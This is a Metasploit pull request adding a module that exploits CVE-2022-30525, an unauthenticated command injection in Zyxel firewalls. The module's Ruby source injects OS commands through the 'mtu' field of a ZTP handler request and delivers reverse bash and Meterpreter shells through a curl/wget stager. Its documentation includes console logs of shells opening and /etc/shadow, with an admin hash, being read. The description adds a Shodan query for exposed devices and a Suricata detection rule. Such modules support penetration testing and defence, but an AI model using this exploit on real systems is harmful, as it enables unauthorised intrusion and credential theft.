### PR TITLE
Zyxel Firewall Unauthenticated Command Injection (CVE-2022-30525)

### DIFF
--- a/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
@@ -2,12 +2,12 @@
 
 ### Description
 
-This module exploits CVE-2022-30525, an unauthenticated and remote
+This module exploits CVE-2022-30525, an unauthenticated remote
 command injection vulnerability affecting Zyxel firewalls with zero
-touch provisioning (ZTP) support. This module exploits a command injection
-exposed by the /ztp/cgi-bin/handler when handling setWanPortSt commands.
-The module adds OS commands to the mtu field of the setWanPortSt request
-in order to achieve command execution as `nobody`.
+touch provisioning (ZTP) support. By sending a malicious `setWanPortSt`
+command containing an `mtu` field with a crafted OS command to the
+`/ztp/cgi-bin/handler` page, an attacker can gain remote command execution
+as the `nobody` user.
 
 Affected Zyxel models are:
 
@@ -17,13 +17,13 @@ Affected Zyxel models are:
 
 ### Setup
 
-The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+The vulnerable system is a hardware firewall/VPN that, to our knowledge,
 cannot be emulated. As such, testing requires a physical device. After
 acquiring the device, Zyxel will require the system be registered and
 updated (this will require registering an account at zyxel.com). Firmware
 on the system, however, can be downgraded. Acquire a vulnerable firmware
 version and downgrade (if needed). The system should be in a vulnerable
-state as long as it's using a vulnerable firmware (affected versions
+state so long as it's using a vulnerable firmware version (affected versions
 listed above).
 
 ## Verification Steps
@@ -52,7 +52,7 @@ msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
 LHOST => 10.0.0.28
 msf6 exploit(linux/http/zyxel_ztp_rce) > run
 
-[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Started reverse TCP handler on 10.0.0.28:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
 [*] Executing Shell Dropper for cmd/unix/reverse_bash
@@ -102,7 +102,7 @@ msf6 exploit(linux/http/zyxel_ztp_rce) > set target 1
 target => 1
 msf6 exploit(linux/http/zyxel_ztp_rce) > run
 
-[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Started reverse TCP handler on 10.0.0.28:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
 [*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp

--- a/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
@@ -1,0 +1,159 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an unauthenticated and remote command injection
+vulnerability affecting Zyxel firewalls with zero touch provisioning
+(ZTP) support. This module exploits the command injection exposed by
+the `/ztp/cgi-bin/handler` when handling setWanPortSt commands. The
+module adds commands to the mtu field in order to achieve command
+execution as `nobody`.
+
+Affected Zyxel models are:
+
+* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
+* USG20-VPN, USG20W-VPN, USG2200-VPN using firmware 5.21 and below
+* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
+
+### Setup
+
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. After
+acquiring the device, Zyxel will require the system be registered and
+updated (this will require registering an account at zyxel.com). Firmware
+on the system, however, can be downgraded. Acquire a vulnerable firmware
+version and downgrade (if needed). The system should be in a vulnerable
+state as long as it's using a vulnerable firmware (affected versions
+listed above).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/zyxel_ztp_rce`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+## Scenarios
+
+### Successful exploitation of USG Flex 100 using firmware 5.21 for a reverse sh shell as nobody
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending exploit to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:48153 ) at 2022-05-09 14:06:47 -0700
+[+] Exploit successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /etc/shadow
+root:***:12396:0:99999:7:::
+bin:***:12396:0:99999:7:::
+daemon:***:12396:0:99999:7:::
+adm:***:12396:0:99999:7:::
+lp:***:12396:0:99999:7:::
+sync:***:12396:0:99999:7:::
+shutdown:***:12396:0:99999:7:::
+halt:***:12396:0:99999:7:::
+mail:***:12396:0:99999:7:::
+news:***:12396:0:99999:7:::
+uucp:***:12396:0:99999:7:::
+operator:***:12396:0:99999:7:::
+games:***:12396:0:99999:7:::
+ftp:***:12396:0:99999:7:::
+sshd:***:12396:0:99999:7:::
+nobody:***:12396:0:99999:7:::
+debug:***:12396:0:99999:7:::
+#deadbeaf  Don't remove this line
+admin:$5$52TVVua8$64kGlcP7$tNKPUArLMHZtmYy84GwUviNYNwBmDkLQ+cKkP9ToPRZqbAA3tgyfRd58rutqhxl36xVWYYRs5GhzX9Hd3ID9PvH5/F7RH0jPRLlug3+TecNkofrbDf3XOan3L8ZeChhzudZgUkP9A4sXfm6dEXguZ2+nLj98gyh7W8dl2/g+h3giNWW9Qsp1JdvaC3wIV53nlZ4p8JEPbswfsJ+KNEsb8AHajPfE+MVT4iTT9OhxPQnwMYaVhyRfauJeUrLtDHDzZq+bvHfmTp4NxUWOjwbXlBa7D6dRD21U3KW9btQM3SMDMSiwZGX1bo5Bu09lWiyzEPPIsy3n7Jsw+W818cZQm7I4b/BMn5tmdkafJz3uCw4$:19121:0:99999::::
+ldap-users:***:19121:0:99999::::
+radius-users:***:19121:0:99999::::
+ad-users:***:19121:0:99999::::
+ua-users:***:19121:0:99999::::
+cloud-users:***:19121:0:99999::::
+```
+
+### Successful exploitation of USG Flex 100 using firmware 5.21 for a reverse Meterpreter shell as nobody
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.28:8080/vFiLDBVYvqzd
+[*] Sending exploit to /ztp/cgi-bin/handler
+[*] Client 10.0.0.14 (curl/7.70.0) requested /vFiLDBVYvqzd
+[*] Sending payload to 10.0.0.14 (curl/7.70.0)
+[*] Meterpreter session 1 opened (10.0.0.28:4444 -> 10.0.0.14:48159 ) at 2022-05-09 14:11:29 -0700
+[+] Exploit successfully executed.
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 25619 created.
+Channel 1 created.
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+cat /proc/cpuinfo
+system type		: ROUTER7000_REF (CN7020p1.2-1200-AAP)
+machine			: Unknown
+processor		: 0
+cpu model		: Cavium Octeon III V0.2  FPU V0.0
+BogoMIPS		: 2400.00
+wait instruction	: yes
+microsecond timers	: yes
+tlb_entries		: 256
+extra interrupt vector	: yes
+hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
+isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
+ASEs implemented	: vz
+shadow register sets	: 1
+kscratch registers	: 4
+core			: 0
+VCED exceptions		: not available
+VCEI exceptions		: not available
+
+processor		: 1
+cpu model		: Cavium Octeon III V0.2  FPU V0.0
+BogoMIPS		: 2400.00
+wait instruction	: yes
+microsecond timers	: yes
+tlb_entries		: 256
+extra interrupt vector	: yes
+hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
+isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
+ASEs implemented	: vz
+shadow register sets	: 1
+kscratch registers	: 4
+core			: 1
+VCED exceptions		: not available
+VCEI exceptions		: not available
+```

--- a/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
@@ -17,14 +17,35 @@ Affected Zyxel models are:
 
 ### Setup
 
-The vulnerable system is a hardware firewall/VPN that, to our knowledge,
-cannot be emulated. As such, testing requires a physical device. After
-acquiring the device, Zyxel will require the system be registered and
-updated (this will require registering an account at zyxel.com). Firmware
-on the system, however, can be downgraded. Acquire a vulnerable firmware
-version and downgrade (if needed). The system should be in a vulnerable
-state so long as it's using a vulnerable firmware version (affected versions
-listed above).
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. Once the
+device has been acquired, you'll need to accomplish the following:
+
+* Once powered on, register the device with Zyxel. You cannot do anything
+with the device until this is accomplished. Fortunately, the web interface
+will force you to complete this process. You'll need to create an account at
+https://portal.myzyxel.com and the firewall will need internet connectivity
+to complete the process.
+
+* Once the device is up to date, you'll need to downgrade the firmware. From
+portal.myzyxel.com you can download old firmware from:
+
+Devices Management -> Firmware Download
+
+From there you can select model and version to download. The last vulnerable
+version from the affected systems is 5.21 Patch 1.
+
+* Once you are using the vulnerable version, there is no special configuration
+you need to exploit from the LAN. If you want to exploit from the WAN, you'll
+need to enable "HTTP" and/or "HTTPS" through the firewall. From the web interface
+do:
+
+Configuration -> Objects -> Service -> Service Group -> Default_Allow_WAN_To_ZyWALL
+
+And move "HTTP" and/or "HTTPS" from the left column to the right. After applying
+the firewall should pass HTTP/HTTPS through the firewall to the web interface.
+
+* That's it. You are good to go.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_ztp_rce.md
@@ -2,17 +2,17 @@
 
 ### Description
 
-This module exploits an unauthenticated and remote command injection
-vulnerability affecting Zyxel firewalls with zero touch provisioning
-(ZTP) support. This module exploits the command injection exposed by
-the `/ztp/cgi-bin/handler` when handling setWanPortSt commands. The
-module adds commands to the mtu field in order to achieve command
-execution as `nobody`.
+This module exploits CVE-2022-30525, an unauthenticated and remote
+command injection vulnerability affecting Zyxel firewalls with zero
+touch provisioning (ZTP) support. This module exploits a command injection
+exposed by the /ztp/cgi-bin/handler when handling setWanPortSt commands.
+The module adds OS commands to the mtu field of the setWanPortSt request
+in order to achieve command execution as `nobody`.
 
 Affected Zyxel models are:
 
 * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
-* USG20-VPN, USG20W-VPN, USG2200-VPN using firmware 5.21 and below
+* USG20-VPN and USG20W-VPN using firmware 5.21 and below
 * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
 
 ### Setup

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -16,12 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
         'Description' => %q{
-          This module exploits CVE-2022-30525, an unauthenticated and remote
+          This module exploits CVE-2022-30525, an unauthenticated remote
           command injection vulnerability affecting Zyxel firewalls with zero
-          touch provisioning (ZTP) support. This module exploits a command injection
-          exposed by the /ztp/cgi-bin/handler when handling setWanPortSt commands.
-          The module adds OS commands to the mtu field of the setWanPortSt request
-          in order to achieve command execution as `nobody`.
+          touch provisioning (ZTP) support. By sending a malicious setWanPortSt
+          command containing an mtu field with a crafted OS command to the
+          /ztp/cgi-bin/handler page, an attacker can gain remote command execution
+          as the nobody user.
 
           Affected Zyxel models are:
 
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -35,6 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'CVE', '2022-30525' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']
         ],
         'DisclosureDate' => '2022-04-28',
         'Platform' => ['unix', 'linux'],

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if ver[0..5].to_i < 220420
-      model = res.body[/<title>(?<model>[^<]+)/, :model]
+      model = res.get_html_document.xpath('//title').text
       if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
         return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
       end

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',
+        'Description' => %q{
+          This module exploits CVE-2022-30525, an unauthenticated and remote
+          command injection vulnerability affecting Zyxel firewalls with zero
+          touch provisioning (ZTP) support. This module exploits a command injection
+          exposed by the /ztp/cgi-bin/handler when handling setWanPortSt commands.
+          The module adds OS commands to the mtu field of the setWanPortSt request
+          in order to achieve command execution as `nobody`.
+
+          Affected Zyxel models are:
+
+          * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
+          * USG20-VPN, USG20W-VPN, USG2200-VPN using firmware 5.21 and below
+          * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-30525' ],
+        ],
+        'DisclosureDate' => '2022-04-28',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPS64,],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  # Checks the build date that is embedded in the landing page. If it finds a build
+  # date older than April 20, 2022 then it will additionally check if the model is
+  # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
+  # seems like a reasonable approach.
+  def check
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
+    unless res
+      return CheckCode::Unknown('The target failed to respond to check.')
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe('Failed to retrieve /')
+    end
+
+    ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
+    if ver.nil?
+      return CheckCode::Safe('Could not extract a version number')
+    end
+
+    if ver[0..5].to_i < 220420
+      model = res.body[/<title>(?<model>[^<]+)/, :model]
+      if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
+        return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
+      end
+    end
+
+    CheckCode::Safe("This determination is based on the build date string: #{ver}.")
+  end
+
+  def execute_command(cmd, _opts = {})
+    handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
+    print_status("Sending exploit to #{handler_uri}")
+
+    # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
+    # but it's more involved.
+    http_payload = {
+      'command' => 'setWanPortSt',
+      'proto' => 'dhcp',
+      'port' => Rex::Text.rand_text_numeric(4).to_s,
+      'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,
+      'vlanid' => Rex::Text.rand_text_numeric(4).to_s,
+      'mtu' => ";#{cmd};",
+      'data' => ''
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => handler_uri,
+      'headers' =>
+      {
+        'Content-Type' => 'application/json; charset=utf-8'
+      },
+      'data' => http_payload.to_json
+    })
+    # Successful exploitation can result in no response (connection being held open by a reverse shell)
+    # or, if the command executes immediately, a response with a 503.
+    if res && res.code != 503
+      fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")
+    end
+    print_good('Exploit successfully executed.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Affected Zyxel models are:
 
           * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
-          * USG20-VPN, USG20W-VPN, USG2200-VPN using firmware 5.21 and below
+          * USG20-VPN and USG20W-VPN using firmware 5.21 and below
           * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/linux/http/zyxel_ztp_rce.rb
+++ b/modules/exploits/linux/http/zyxel_ztp_rce.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2022-04-28',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_MIPS64,],
-        'Privileged' => true,
+        'Privileged' => false,
         'Targets' => [
           [
             'Shell Dropper',
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
-    print_status("Sending exploit to #{handler_uri}")
+    print_status("Sending command to #{handler_uri}")
 
     # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
     # but it's more involved.
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code != 503
       fail_with(Failure::UnexpectedReply, "The target replied with HTTP status #{res.code}. No reply was expected.")
     end
-    print_good('Exploit successfully executed.')
+    print_good('Command successfully executed.')
   end
 
   def exploit


### PR DESCRIPTION
This module exploits CVE-2022-30525, an unauthenticated and remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. This module exploits a command injection exposed by the `/ztp/cgi-bin/handler` when handling `setWanPortSt` commands. The module adds OS commands to the `mtu` field of the `setWanPortSt` request in order to achieve command execution as `nobody`.

Affected Zyxel models are:

* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below
* USG20-VPN and USG20W-VPN using firmware 5.21 and below
* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below

## Check method

The command injection is blind, so I wrote the check function to key off of two elements in the management interface's `index.html`:

* The title tag. It reliably contains the model (e.g. USG FLEX 100).
* A timestamp indicating when the firmware was compiled. The fixed firmware all have a timestamp of April 20, 2022. 

I wrote a [test server](https://github.com/jbaines-r7/zyxel_scanner_environment) to validate that works across all affected versions. The test server uses some `index.html` I snagged off of [Shodan](https://www.shodan.io/search?query=title%3A%22USG+FLEX+100%22%2C%22USG+FLEX+100w%22%2C%22USG+FLEX+200%22%2C%22USG+FLEX+500%22%2C%22USG+FLEX+700%22%2C%22USG+FLEX+50%22%2C%22USG+FLEX+50w%22%2C%22ATP100%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22). The `check` function works fine on all of those.

## Another Thing

I set the disclosure date to April 28, 2022. That's the date Zyxel released the patched firmware. :shrug: 

## Verification

If you have a test target:

- [x]  Follow setup steps above.
- [x]  Do: `use exploit/linux/http/zyxel_ztp_rce`
- [x] Do: `set RHOST <ip>`
- [x] Do: `check`
- [x] Verify the remote host is vulnerable.
- [ ] Do: `set LHOST <ip>`
- [ ] Do: `run`
- [ ] Verify the module acquires a `nobody` shell

## PoC Video || GTFO

https://youtu.be/ATdh-TW934k

## PCAP || GTFO

[zyxel_cve_2022_30525_twice.zip](https://github.com/rapid7/metasploit-framework/files/8677221/zyxel_cve_2022_30525_twice.zip)

Perhaps useful to some, the following Suricata rule triggers for both exploitation attempts in the pcap (one for reverse bash, one for reverse meterpreter).

```
alert http any any -> any any ( \
    msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/ztp/cgi-bin/handler"; \
    http.request_body; content:"setWanPortSt"; \
    http.request_body; content:"mtu"; \
    http.request_body; pcre:"/mtu["']\s*:\s*["']\s*[^0-9]+/i";
    classtype:misc-attack; \
    sid:221270;)
```